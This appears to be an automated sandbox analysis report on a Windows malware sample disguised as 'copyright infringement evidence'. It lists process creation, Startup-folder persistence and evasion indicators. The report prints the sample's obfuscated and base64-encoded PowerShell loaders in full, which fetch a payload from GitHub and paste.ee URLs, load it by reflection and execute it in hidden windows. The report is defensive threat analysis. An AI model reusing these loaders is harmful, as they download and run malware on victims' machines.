Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($base64Content); $assembly = [Reflection.Assembly]::Load($binaryContent); $command = '[dnlib.IO.Home]::VAI("0/zbEuc/d/ee.etsap//:sptth", "1", "C:\ProgramData\", "tondinho", "AppLaunch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17A2F54 pushfq ; iretd 0_2_00007FF7A17A2F59
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_00007FF83B8E00BD pushad ; iretd 29_2_00007FF83B8E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 30_2_00007FF83B8C00BD pushad ; iretd 30_2_00007FF83B8C00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_00007FF83B8F00BD pushad ; iretd 31_2_00007FF83B8F00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_00007FF83B8F19D8 pushad ; ret 31_2_00007FF83B8F19E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_00007FF83B8E00BD pushad ; iretd 33_2_00007FF83B8E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FF83B8B00BD pushad ; iretd 35_2_00007FF83B8B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FF83B8B7AD0 pushad ; ret 35_2_00007FF83B8B7AD9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FF83B8B00BD pushad ; iretd 36_2_00007FF83B8B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 43_2_00007FF83B8C00BD pushad ; iretd 43_2_00007FF83B8C00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 43_2_00007FF83B8C4AF2 push eax; retf 43_2_00007FF83B8C4B09
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 45_2_00007FF83B8E00BD pushad ; iretd 45_2_00007FF83B8E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 45_2_00007FF83B8E2AE2 pushad ; iretd 45_2_00007FF83B8E2AE1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 45_2_00007FF83B8E2A25 pushad ; iretd 45_2_00007FF83B8E2AE1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 45_2_00007FF83B8E2375 pushad ; retf 45_2_00007FF83B8E2399
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 45_2_00007FF83B9B4779 push 90000047h; iretd 45_2_00007FF83B9B47B9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 53_2_00007FF83B8B00BD pushad ; iretd 53_2_00007FF83B8B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 53_2_00007FF83B9836ED pushad ; retf 53_2_00007FF83B983772

Boot Survival

Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.bat
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2x_bee.js.bat
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js

Hooking and other Techniques for Hiding and Protection

Source: initial sample Icon embedded in binary file: icon matches a legit application icon: download (98).png
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
